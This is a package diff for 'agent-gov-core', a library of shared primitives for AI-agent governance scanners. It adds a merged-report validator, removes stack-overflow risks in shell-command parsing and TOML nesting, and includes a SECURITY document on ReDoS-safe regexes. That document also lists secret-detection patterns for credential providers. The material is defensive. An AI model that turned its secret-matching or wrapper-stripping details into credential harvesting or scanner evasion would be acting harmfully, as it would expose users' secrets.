+ - `lineOfTomlKey(text, dottedKey, scope?)` — optional `scope: ByteRange` parameter for parity with `lineOfJsonKey` and `lineOfJsonStringValue`. Useful when an outer locator has already pinned a parent table's range and you want to find a leaf inside it without false matches from a sibling table.
218
+
219
+ ### Deprecated
220
+ - `JsonObjectWithSource.json` — prefer `value`. Will be removed in a future major version.
221
+ - `TomlObjectWithSource.toml` — prefer `value`. Will be removed in a future major version.
222
+
223
+ ## [0.3.1] — 2026-05-22
224
+
225
+ ### Added
226
+ - Secondary entry point `agent-gov-core/test-utils` with fixtures the suite repos all hand-rolled:
227
+ - `writeFiles(dir, fileMap)` — write a path-to-content map, creating parent directories.
228
+ - `makeGitRepo({initialFiles?, initialMessage?})` → `{repo, commit, head, git, cleanup}` — temp git repo on branch `main` with placeholder identity. `commit()` applies files and commits, returning the new SHA.
229
+ - `makeOldNewFixture({old, new})` → `{old, new, cleanup}` — two sibling temp directories for diff-mode CLI tests.
230
+
231
+ ## [0.3.0] — 2026-05-22
232
+
233
+ ### Added
234
+ - `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you.
235
+ - `fingerprintFinding(finding)` — 16-char hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe.
236
+ - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`.
237
+ - `CreateFindingSpec` and `FindingValidationResult` types.
238
+ - JSDoc `@example` blocks on `tokenizeShell`, `getCommandHead`, `normalizeMcpCommand`, `emitFindingAnnotation`.
239
+ - JSDoc on `ToolKind` explaining the schema/runtime lockstep contract.
240
+
241
+ ## [0.2.0] — earlier
242
+
243
+ ### Added
244
+ - `kind(tool, name)` — typed helper that builds `<tool>.<slug>` strings.
245
+ - `isNamespacedKind(value)` — runtime guard matching the JSON schema's `kind` pattern.
246
+
247
+ ### Changed
248
+ - Schema regex tightened to require namespaced kinds: `^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$`.
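A guard built directly from the tightened schema regex might look like the sketch below. The regex is copied from the entry above; `isNamespacedKindSketch`, `kindSketch`, and in particular the slug rule (lowercase, runs of other characters collapsed to `_`) are assumptions for illustration, since the changelog does not describe how `kind()` derives its slug.

```typescript
type ToolKindSketch =
  | "scope_trail"
  | "policy_mesh"
  | "capability_echo"
  | "task_bound"
  | "session_trail";

// Pattern taken verbatim from the schema regex quoted in this changelog.
const KIND_PATTERN =
  /^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$/;

// Hypothetical guard: true only for `<tool>.<slug>` strings.
function isNamespacedKindSketch(value: unknown): value is string {
  return typeof value === "string" && KIND_PATTERN.test(value);
}

// Hypothetical builder; the slug normalization here is an assumption.
function kindSketch(tool: ToolKindSketch, name: string): string {
  const slug = name.toLowerCase().replace(/[^a-z0-9_]+/g, "_");
  return `${tool}.${slug}`;
}
```

Keeping the tool list in one pattern mirrors the lockstep concern noted for `ToolKind`: a new tool has to be added to both the type and the regex.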
249
+
250
+ ## [0.1.2] — earlier
251
+
252
+ ### Changed
253
+ - `normalizeMcpCommand` drops neutral confirm flags (`-y`, `--yes`) before canonicalization, so `npx -y foo` and `npx foo` produce the same identity.
254
+
255
+ ## [0.1.0] — earlier
256
+
257
+ Initial release. Finding schema, JSONC/TOML readers, line locators, MCP normalization, shell tokenization, and GitHub Action helpers.
package/README.md CHANGED
@@ -106,7 +106,8 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
106
106
  - `createReport({tool, findings, ...})` — sets `schemaVersion` and derives `rating` from max finding severity
107
107
  - `maxSeverity(findings)` — returns `'none' | Severity`, used by `createReport`
108
108
  - `validateReport(value)` — strict envelope check including each finding; returns `{ ok, errors[] }`
109
- - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it.
109
+ - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it. Optional `opts.workflowName` is round-tripped onto `MergedReport.workflowName` — cross-walks to OpenTelemetry's `gen_ai.workflow.name` (see [`docs/INTEROP-OTEL.md`](./docs/INTEROP-OTEL.md)).
110
+ - `validateMergedReport(value)` — strict envelope check for the merge layer's output (mirrors `validateReport` for the source side). Used by a meta-reviewer that needs to round-trip merged reports through JSON.
110
111
 
111
112
  ### Config readers
112
113
  - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
package/dist/index.d.ts CHANGED
@@ -8,7 +8,7 @@ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
8
8
  export type { Report, CreateReportSpec, ReportValidationResult } from './report.js';
9
9
  export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
10
10
  export type { MergeOptions, MergeSource, InvalidReport, InvalidFinding, MergedReport, } from './merge.js';
11
- export { mergeFindings } from './merge.js';
11
+ export { mergeFindings, validateMergedReport } from './merge.js';
12
12
  export type { SecretMatch, MatchSecretOptions } from './secrets.js';
13
13
  export { matchSecret, SECRET_PATTERNS } from './secrets.js';
14
14
  export type { Exception, ApplyExceptionsResult } from './exceptions.js';
package/dist/index.js CHANGED
@@ -3,7 +3,7 @@ export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
4
  export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
5
5
  export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
6
- export { mergeFindings } from './merge.js';
6
+ export { mergeFindings, validateMergedReport } from './merge.js';
7
7
  export { matchSecret, SECRET_PATTERNS } from './secrets.js';
8
8
  export { applyExceptions, validateException } from './exceptions.js';
9
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
package/dist/merge.d.ts CHANGED
@@ -12,6 +12,13 @@ export interface MergeOptions {
       * to keep the first report's finding instead. Default: `'highest_severity'`.
       */
      duplicatePolicy?: 'highest_severity' | 'first';
+     /**
+      * Optional workflow identifier propagated onto the resulting `MergedReport`.
+      * Cross-walks to OpenTelemetry's `gen_ai.workflow.name` so a meta-reviewer
+      * rolling up N tool reports for one workflow run can carry the same string
+      * downstream tracing already uses. See `docs/INTEROP-OTEL.md`.
+      */
+     workflowName?: string;
  }
  export interface MergeSource {
      tool: ToolKind;
@@ -52,6 +59,12 @@ export interface MergedReport {
       * mixing.
       */
      conversationId?: string;
+     /**
+      * Workflow identifier supplied by the meta-reviewer caller. Cross-walks to
+      * OpenTelemetry's `gen_ai.workflow.name`. Set only when explicitly passed
+      * via `MergeOptions.workflowName` — never inferred.
+      */
+     workflowName?: string;
      /** Deduped findings, sorted by severity (highest first). */
      findings: Finding[];
      /** Count of findings dropped because their severity was below `threshold`. */
@@ -88,4 +101,21 @@ export interface MergedReport {
   * console.log(`${merged.findings.length} unique findings across ${merged.sources.length} tools`);
   */
  export declare function mergeFindings(reports: readonly unknown[], opts?: MergeOptions): MergedReport;
+ /**
+  * Runtime check that a value conforms to the {@link MergedReport} envelope.
+  * Mirrors {@link validateReport} but for the merge layer's output. Does NOT
+  * recurse into individual findings — `mergeFindings` has already validated
+  * them and routed invalid ones to `invalidFindings`. The contract here is
+  * envelope structure plus the merge-specific counter and provenance fields.
+  *
+  * @example
+  * import { mergeFindings, validateMergedReport } from 'agent-gov-core';
+  * const merged = mergeFindings(reports, { workflowName: 'pr-1234-review' });
+  * const check = validateMergedReport(merged);
+  * if (!check.ok) throw new Error(check.errors.join('; '));
+  */
+ export declare function validateMergedReport(value: unknown): {
+     ok: boolean;
+     errors: string[];
+ };
  //# sourceMappingURL=merge.d.ts.map
package/dist/merge.js CHANGED
@@ -131,8 +131,115 @@ export function mergeFindings(reports, opts = {}) {
      };
      if (allSame)
          merged.conversationId = conversationIds[0];
+     if (opts.workflowName !== undefined)
+         merged.workflowName = opts.workflowName;
      return merged;
  }
+ const MERGED_REPORT_ALLOWED_KEYS = new Set([
+     'schemaVersion',
+     'sources',
+     'rating',
+     'conversationId',
+     'workflowName',
+     'findings',
+     'droppedBelowThreshold',
+     'duplicateCollapsed',
+     'invalidReports',
+     'invalidFindings',
+     'severityCounts',
+ ]);
+ const MERGED_RATING_VALUES = new Set(['none', ...SEVERITIES]);
+ /**
+  * Runtime check that a value conforms to the {@link MergedReport} envelope.
+  * Mirrors {@link validateReport} but for the merge layer's output. Does NOT
+  * recurse into individual findings — `mergeFindings` has already validated
+  * them and routed invalid ones to `invalidFindings`. The contract here is
+  * envelope structure plus the merge-specific counter and provenance fields.
+  *
+  * @example
+  * import { mergeFindings, validateMergedReport } from 'agent-gov-core';
+  * const merged = mergeFindings(reports, { workflowName: 'pr-1234-review' });
+  * const check = validateMergedReport(merged);
+  * if (!check.ok) throw new Error(check.errors.join('; '));
+  */
+ export function validateMergedReport(value) {
+     const errors = [];
+     if (value === null || typeof value !== 'object' || Array.isArray(value)) {
+         return { ok: false, errors: ['merged report must be a plain object'] };
+     }
+     const v = value;
+     if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
+         errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
+     }
+     if (typeof v.rating !== 'string' || !MERGED_RATING_VALUES.has(v.rating)) {
+         errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
+     }
+     if (!Array.isArray(v.sources)) {
+         errors.push('sources must be an array');
+     }
+     else {
+         for (let i = 0; i < v.sources.length; i++) {
+             const s = v.sources[i];
+             if (s === null || typeof s !== 'object' || Array.isArray(s)) {
+                 errors.push(`sources[${i}] must be a plain object`);
+                 continue;
+             }
+             const src = s;
+             if (!isToolKind(src.tool)) {
+                 errors.push(`sources[${i}].tool must be one of: ${TOOL_KINDS.join(', ')}`);
+             }
+             if (typeof src.findingCount !== 'number' || !Number.isInteger(src.findingCount) || src.findingCount < 0) {
+                 errors.push(`sources[${i}].findingCount must be a non-negative integer`);
+             }
+             if (typeof src.rating !== 'string' || !MERGED_RATING_VALUES.has(src.rating)) {
+                 errors.push(`sources[${i}].rating must be one of: none, ${SEVERITIES.join(', ')}`);
+             }
+             if (src.toolVersion !== undefined && typeof src.toolVersion !== 'string') {
+                 errors.push(`sources[${i}].toolVersion must be a string when present`);
+             }
+             if (src.conversationId !== undefined && typeof src.conversationId !== 'string') {
+                 errors.push(`sources[${i}].conversationId must be a string when present`);
+             }
+         }
+     }
+     if (!Array.isArray(v.findings)) {
+         errors.push('findings must be an array');
+     }
+     for (const counter of ['droppedBelowThreshold', 'duplicateCollapsed']) {
+         const n = v[counter];
+         if (typeof n !== 'number' || !Number.isInteger(n) || n < 0) {
+             errors.push(`${counter} must be a non-negative integer`);
+         }
+     }
+     if (!Array.isArray(v.invalidReports))
+         errors.push('invalidReports must be an array');
+     if (!Array.isArray(v.invalidFindings))
+         errors.push('invalidFindings must be an array');
+     const counts = v.severityCounts;
+     if (counts === null || typeof counts !== 'object' || Array.isArray(counts)) {
+         errors.push('severityCounts must be a plain object');
+     }
+     else {
+         const c = counts;
+         for (const sev of SEVERITIES) {
+             const n = c[sev];
+             if (typeof n !== 'number' || !Number.isInteger(n) || n < 0) {
+                 errors.push(`severityCounts.${sev} must be a non-negative integer`);
+             }
+         }
+     }
+     if (v.conversationId !== undefined && typeof v.conversationId !== 'string') {
+         errors.push('conversationId must be a string when present');
+     }
+     if (v.workflowName !== undefined && typeof v.workflowName !== 'string') {
+         errors.push('workflowName must be a string when present');
+     }
+     for (const key of Object.keys(v)) {
+         if (!MERGED_REPORT_ALLOWED_KEYS.has(key))
+             errors.push(`unknown property: ${key}`);
+     }
+     return { ok: errors.length === 0, errors };
+ }
  function candidateTool(value) {
      if (value === null || typeof value !== 'object')
          return undefined;
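The envelope check added to `merge.js` combines three ideas: reject anything that is not a plain object, type-check each known field, and flag keys outside an allow-list. The following is a minimal, self-contained sketch of that pattern only. It is not the library's implementation: `checkEnvelope`, `ALLOWED_KEYS`, and the three-field envelope are hypothetical stand-ins chosen to keep the example short.

```javascript
// Hypothetical three-field envelope; the real MergedReport has more fields.
const ALLOWED_KEYS = new Set(['findings', 'duplicateCollapsed', 'workflowName']);

function isNonNegativeInteger(n) {
    return typeof n === 'number' && Number.isInteger(n) && n >= 0;
}

// Collects every problem instead of stopping at the first one,
// so a caller can report all envelope errors in a single pass.
function checkEnvelope(value) {
    if (value === null || typeof value !== 'object' || Array.isArray(value)) {
        return { ok: false, errors: ['envelope must be a plain object'] };
    }
    const errors = [];
    if (!Array.isArray(value.findings)) {
        errors.push('findings must be an array');
    }
    if (!isNonNegativeInteger(value.duplicateCollapsed)) {
        errors.push('duplicateCollapsed must be a non-negative integer');
    }
    if (value.workflowName !== undefined && typeof value.workflowName !== 'string') {
        errors.push('workflowName must be a string when present');
    }
    // Allow-list check: any key not named above is reported as unknown.
    for (const key of Object.keys(value)) {
        if (!ALLOWED_KEYS.has(key)) {
            errors.push(`unknown property: ${key}`);
        }
    }
    return { ok: errors.length === 0, errors };
}

const good = checkEnvelope({ findings: [], duplicateCollapsed: 0, workflowName: 'pr-1234-review' });
const bad = checkEnvelope({ findings: [], duplicateCollapsed: -1, extra: true });
console.log(good.ok, bad.errors);
```

In this sketch the second call fails for two independent reasons (a negative counter and an unlisted key), which is why the result carries an `errors` array rather than a single message.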
package/dist/shell.js CHANGED
@@ -329,19 +329,26 @@ function readQuotedArg(input, start) {
   */
  export function getCommandHead(subcommand) {
      let s = subcommand.trimStart();
-     // Strip leading env var assignments: `FOO=bar BAZ=qux curl ...`
-     while (true) {
-         const m = /^([A-Za-z_][A-Za-z0-9_]*)=([^\s'"]*|"[^"]*"|'[^']*')\s+/.exec(s);
-         if (!m)
+     // Iterative wrapper-stripping. Was previously recursive; a pathological input
+     // like `sudo sudo sudo … curl` (20k repetitions) could blow the JS stack
+     // since V8 does not reliably do tail-call optimization. The 64-iteration cap
+     // is well above any plausible legitimate wrapper chain (`sudo nohup env …`)
+     // while still bounding worst-case time.
+     for (let depth = 0; depth < 64; depth++) {
+         // Strip leading env var assignments: `FOO=bar BAZ=qux curl ...`
+         while (true) {
+             const m = /^([A-Za-z_][A-Za-z0-9_]*)=([^\s'"]*|"[^"]*"|'[^']*')\s+/.exec(s);
+             if (!m)
+                 break;
+             s = s.slice(m[0].length);
+         }
+         // Strip leading sudo / env wrappers, then also strip any wrapper flags
+         // (`sudo -E`, `env -i`) and embedded env vars (`env FOO=1 BAZ=qux curl`)
+         // before re-checking. Without this, `sudo -E curl` would return `-E`.
+         const wrapperMatch = /^(sudo|nohup|env|exec|command|builtin|stdbuf|nice|ionice|setsid)\s+(.*)$/.exec(s);
+         if (!wrapperMatch)
              break;
-         s = s.slice(m[0].length);
-     }
-     // Strip leading sudo / env wrappers, then also strip any wrapper flags
-     // (`sudo -E`, `env -i`) and embedded env vars (`env FOO=1 BAZ=qux curl`)
-     // before recursing. Without this, `sudo -E curl` would return `-E`.
-     const wrapperMatch = /^(sudo|nohup|env|exec|command|builtin|stdbuf|nice|ionice|setsid)\s+(.*)$/.exec(s);
-     if (wrapperMatch) {
-         return getCommandHead(stripWrapperPrefixes(wrapperMatch[2]));
+         s = stripWrapperPrefixes(wrapperMatch[2]);
      }
      // Now extract first token, honoring quoting and obfuscation neutralization.
      const head = readFirstToken(s);
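The change above replaces recursion with a loop that has a fixed iteration cap. A reduced sketch of that idea follows, assuming a much smaller wrapper list and a naive whitespace split in place of the library's `stripWrapperPrefixes` and `readFirstToken`. The names `commandHeadSketch`, `WRAPPER`, and `MAX_WRAPPER_DEPTH` are hypothetical and exist only for this illustration.

```javascript
// Cap taken from the diff; the wrapper list here is deliberately shortened.
const MAX_WRAPPER_DEPTH = 64;
const WRAPPER = /^(sudo|nohup|env)\s+(.*)$/;

// Strips leading wrappers one per iteration. Because this is a loop and not
// recursion, stack depth stays constant however long the wrapper chain is.
function commandHeadSketch(command) {
    let s = command.trimStart();
    for (let depth = 0; depth < MAX_WRAPPER_DEPTH; depth++) {
        const m = WRAPPER.exec(s);
        if (!m) {
            break;
        }
        s = m[2].trimStart();
    }
    // Naive first-token extraction: no quoting or flag handling.
    const end = s.search(/\s/);
    return end === -1 ? s : s.slice(0, end);
}

const shallow = commandHeadSketch('sudo nohup curl https://example.com');
const deep = commandHeadSketch('sudo '.repeat(20000) + 'curl');
console.log(shallow, deep);
```

With the 20,000-wrapper input the loop stops after 64 iterations, so this sketch reports the next remaining wrapper as the head instead of overflowing the stack. The cap trades exactness on absurd inputs for bounded work.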
package/dist/toml.js CHANGED
@@ -34,6 +34,15 @@ class TomlParser {
      definedTables = new Set();
      /** Path of an array-of-tables table currently being filled. */
      aotPaths = new Set();
+     /**
+      * Current nesting depth through parseValue → parseArray|parseInlineTable →
+      * parseValue → … . Bounded so a hostile TOML like `{ a = { a = { … } } }`
+      * cannot blow the JS stack and crash a consumer that calls parseToml
+      * directly (readTomlObject's try/catch would catch RangeError, but defense
+      * in depth is cheap and a clean error is friendlier than a stack overflow).
+      */
+     valueDepth = 0;
+     static MAX_VALUE_DEPTH = 200;
      /**
       * Internal delimiter for joining dotted-key path components into a single
       * hashable string. NUL is illegal in TOML keys (basic strings can't contain
@@ -266,26 +275,35 @@ class TomlParser {
          this.expectLineEnd();
      }
      parseValue() {
-         const c = this.src[this.pos];
-         if (c === '"') {
-             if (this.src[this.pos + 1] === '"' && this.src[this.pos + 2] === '"') {
-                 return this.parseMultilineBasicString();
-             }
-             return this.parseBasicString();
+         if (this.valueDepth >= TomlParser.MAX_VALUE_DEPTH) {
+             throw new Error(`TOML nesting too deep (>${TomlParser.MAX_VALUE_DEPTH}) at offset ${this.pos}`);
          }
-         if (c === "'") {
-             if (this.src[this.pos + 1] === "'" && this.src[this.pos + 2] === "'") {
-                 return this.parseMultilineLiteralString();
+         this.valueDepth++;
+         try {
+             const c = this.src[this.pos];
+             if (c === '"') {
+                 if (this.src[this.pos + 1] === '"' && this.src[this.pos + 2] === '"') {
+                     return this.parseMultilineBasicString();
+                 }
+                 return this.parseBasicString();
              }
-             return this.parseLiteralString();
+             if (c === "'") {
+                 if (this.src[this.pos + 1] === "'" && this.src[this.pos + 2] === "'") {
+                     return this.parseMultilineLiteralString();
+                 }
+                 return this.parseLiteralString();
+             }
+             if (c === '[')
+                 return this.parseArray();
+             if (c === '{')
+                 return this.parseInlineTable();
+             if (c === 't' || c === 'f')
+                 return this.parseBoolean();
+             return this.parseNumberOrDateTime();
+         }
+         finally {
+             this.valueDepth--;
          }
-         if (c === '[')
-             return this.parseArray();
-         if (c === '{')
-             return this.parseInlineTable();
-         if (c === 't' || c === 'f')
-             return this.parseBoolean();
-         return this.parseNumberOrDateTime();
      }
      parseBasicString() {
          if (this.src[this.pos] !== '"')
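The `parseValue` change guards a mutually recursive parser with a depth counter that is incremented on entry and restored in a `finally` block. The sketch below shows the same guard on a toy grammar (nested arrays of non-negative integers, no whitespace). `NestedArrayParser` and its grammar are hypothetical and unrelated to the library's TOML parser; only the 200-level limit is taken from the diff.

```javascript
class NestedArrayParser {
    static MAX_DEPTH = 200;
    depth = 0;
    pos = 0;

    constructor(src) {
        this.src = src;
    }

    parseValue() {
        // Fail with a clean error before the JS stack can overflow.
        if (this.depth >= NestedArrayParser.MAX_DEPTH) {
            throw new Error(`nesting too deep (>${NestedArrayParser.MAX_DEPTH}) at offset ${this.pos}`);
        }
        this.depth++;
        try {
            if (this.src[this.pos] === '[') {
                return this.parseArray();
            }
            return this.parseInteger();
        } finally {
            // Runs on both return and throw, so the counter never drifts.
            this.depth--;
        }
    }

    parseArray() {
        this.pos++; // consume '['
        const items = [];
        while (this.src[this.pos] !== ']') {
            if (this.pos >= this.src.length) {
                throw new Error('unterminated array');
            }
            items.push(this.parseValue());
            if (this.src[this.pos] === ',') {
                this.pos++;
            }
        }
        this.pos++; // consume ']'
        return items;
    }

    parseInteger() {
        const digits = /\d+/y; // sticky: match only at lastIndex
        digits.lastIndex = this.pos;
        const m = digits.exec(this.src);
        if (!m) {
            throw new Error(`expected integer at offset ${this.pos}`);
        }
        this.pos += m[0].length;
        return Number(m[0]);
    }
}

const parsed = new NestedArrayParser('[1,[2,3],[]]').parseValue();

const hostile = new NestedArrayParser('['.repeat(300) + ']'.repeat(300));
let hostileError = null;
try {
    hostile.parseValue();
} catch (err) {
    hostileError = err;
}
console.log(JSON.stringify(parsed), hostileError && hostileError.message);
```

Putting the decrement in `finally` matters because the guard itself throws from deep inside the recursion. Without it, a parser instance that was reused after an error would start from a stale depth.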
@@ -0,0 +1,53 @@
+ # Security
+
+ This document describes the threat model `agent-gov-core` is designed against, what it deliberately does **not** protect against, and how to report a finding.
+
+ The substrate consumes a lot of untrusted input — JSON/TOML config bodies, shell command text, environment values — and runs regex evaluators over that input. The first edition of this document focuses on that surface. Other surfaces (denial of service via parser nesting, secret exfiltration through error messages) get short sections at the end.
+
+ ## Regex evaluation on untrusted input
+
+ ### What we protect against
+
+ All regex patterns shipped in the library are constructed to evaluate in **linear time** on any input. Specifically:
+
+ - **No nested quantifiers over overlapping character classes** — the classic ReDoS shape `(a+)+` or `(a|a)+` does not appear anywhere in `src/`.
+ - **Disjoint alternation** — every `(x|y|z)` group in the library has branches that are mutually exclusive at the first character (`(sudo|nohup|env|…)`, `(?:sk|rk)_(?:live|test)_…`, `("bare"|"quoted"|'literal')`), so the engine commits early and does not backtrack between branches.
+ - **Anchored where possible** — patterns that scan input from the start use `^`, so the regex engine does not retry from each position.
+ - **Library-defined, not user-supplied** — unlike tools that ship a heuristic ReDoS detector for arbitrary user regexes (e.g. [SessionTrail's `redos_pattern_in_workflow`](https://github.com/Conalh/session-trail)), this library never accepts a pattern from a caller. The patterns are constants compiled into the source tree, audited per release, and locked against regression by [`test/redos.test.mjs`](../test/redos.test.mjs).
+
+ The harness in `test/redos.test.mjs` exercises every regex evaluator that touches external input against ~100 KB of adversarial input shaped to trigger the worst backtracking path the pattern could exhibit (long benign, long near-miss, nested-quantifier-style). Each call must complete under a 50 ms wall-clock budget. The current worst case is the `bash -c` payload extractor at <10 ms — three orders of magnitude clear of catastrophic backtracking.
+
+ The audited regex evaluators are:
+
+ | File | Pattern family | Risk class |
+ |---|---|---|
+ | `src/secrets.ts` | 13 provider patterns (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, npm, Docker, Stripe, hex token) | Safe by construction — fixed prefix + single quantifier over disjoint character class |
+ | `src/shell.ts` | Env-var assignment, wrapper detection (`sudo`, `nohup`, …), dash-`c` runner detection (`bash`, `python`, …) | Safe by construction — anchored, fixed alternation |
+ | `src/locators.ts` | TOML header regex, dynamically-built dotted-key regex, JSON key/value locators | Safe by construction — literal anchors separate every quantifier |
+ | `src/mcp.ts` | Windows executable suffix, trailing slash normalization | Safe by construction — single anchored quantifier |
+
+ ### What we don't protect against
+
+ - **The `dottedKey` argument to `lineOfTomlKey` is treated as developer-supplied, not attacker-supplied.** If a consumer passes a 100 KB attacker-controlled string with embedded regex metacharacters as the `dottedKey`, the dynamic regex constructed from that key can exceed V8's regex-bytecode size limit and throw `SyntaxError` during construction. This is misuse, not a vulnerability: in every consumer of this library (ScopeTrail, PolicyMesh, CapabilityEcho, TaskBound, SessionTrail) the dotted-key search target is derived from the static finding schema, never from input. Callers who route untrusted text into the `dottedKey` parameter should length-cap it themselves before calling.
+ - **RE2 is not a runtime dependency.** The library uses Node's built-in regex engine (V8 Irregexp), which is a backtracking NFA. The safety claim above rests on every shipped pattern being structurally non-pathological, not on the engine refusing to backtrack. A future maintainer who introduces a vulnerable pattern would not be caught by the engine — they would be caught by `test/redos.test.mjs` failing in CI.
+ - **The SessionTrail user-supplied-pattern vector does not apply.** SessionTrail ships a detector that flags ReDoS-vulnerable shapes in *user-authored* workflow regexes (e.g. a GitHub Actions workflow that runs `grep -E "<user pattern>"`). `agent-gov-core` has no equivalent surface — there is no API by which a caller can hand the library a pattern to evaluate.
+
+ ## Other surfaces
+
+ ### Secret material in error messages
+
+ `matchSecret` returns only the provider name, never the literal credential. This contract is asserted in `test/secrets.test.mjs`. Consumers that surface findings to a logging system can do so without leaking the matched bytes.
+
+ `ConfigParseError` carries the original parser error in its `cause`. The original error may contain a snippet of the offending input — if that input held a credential, the credential is in the cause chain. Consumers logging structured findings should not log `error.cause` verbatim.
+
+ ## Reporting a finding
+
+ Open a private security advisory at https://github.com/Conalh/agent-gov-core/security/advisories or email **conal.hg@gmail.com**. Please include:
+
+ - The version (e.g. `v0.8.0`) and the file/function involved.
+ - An input that demonstrates the issue, ideally as a failing test.
+ - For ReDoS reports specifically: the wall-clock time the input takes on your machine plus the input size, so the budget in `test/redos.test.mjs` can be calibrated.
+
+ Reports will be acknowledged within seven days. A patch release follows the same cadence as other security-relevant fixes (`v0.7.1`, `v0.8.x`) — small, targeted, separately tagged, with the affected versions documented in `CHANGELOG.md`.
+
+ The library is pre-1.0 and shipped under MIT with no warranty. Best-effort fixes only; no SLA.
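The security document above describes a harness that times each regex evaluator against roughly 100 KB of adversarial input under a 50 ms budget. The contents of `test/redos.test.mjs` are not part of this diff, so the following is only a rough sketch of what one such timing check could look like. The pattern is the env-var assignment regex from `dist/shell.js`; `timeMatch` and the two inputs are hypothetical.

```javascript
// Budget and input size follow the figures quoted in the security document.
const BUDGET_MS = 50;
const INPUT_SIZE = 100_000;

// Env-var assignment pattern as it appears in dist/shell.js.
const ENV_ASSIGNMENT = /^([A-Za-z_][A-Za-z0-9_]*)=([^\s'"]*|"[^"]*"|'[^']*')\s+/;

// Measures wall-clock time for a single evaluation of the pattern.
function timeMatch(pattern, input) {
    const start = performance.now();
    const matched = pattern.test(input);
    return { matched, elapsedMs: performance.now() - start };
}

// Hypothetical adversarial shapes: a long identifier with no '=',
// and an assignment whose quoted value is never closed.
const adversarialInputs = {
    longBenign: 'a'.repeat(INPUT_SIZE),
    longNearMiss: 'A="' + 'x'.repeat(INPUT_SIZE),
};

const results = Object.entries(adversarialInputs).map(([name, input]) => ({
    name,
    ...timeMatch(ENV_ASSIGNMENT, input),
}));

for (const r of results) {
    const verdict = r.elapsedMs < BUDGET_MS ? 'within budget' : 'OVER BUDGET';
    console.log(`${r.name}: ${r.elapsedMs.toFixed(2)} ms (${verdict})`);
}
```

Both inputs are near-misses by design: neither matches, so the engine has to exhaust its alternatives before giving up, which is the path a backtracking blow-up would show up on. Timings vary by machine, which is presumably why the reporting section asks for wall-clock time together with input size.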
package/package.json CHANGED
@@ -1,6 +1,6 @@
  {
    "name": "agent-gov-core",
-   "version": "0.7.1",
+   "version": "0.8.1",
    "description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
    "type": "module",
    "main": "./dist/index.js",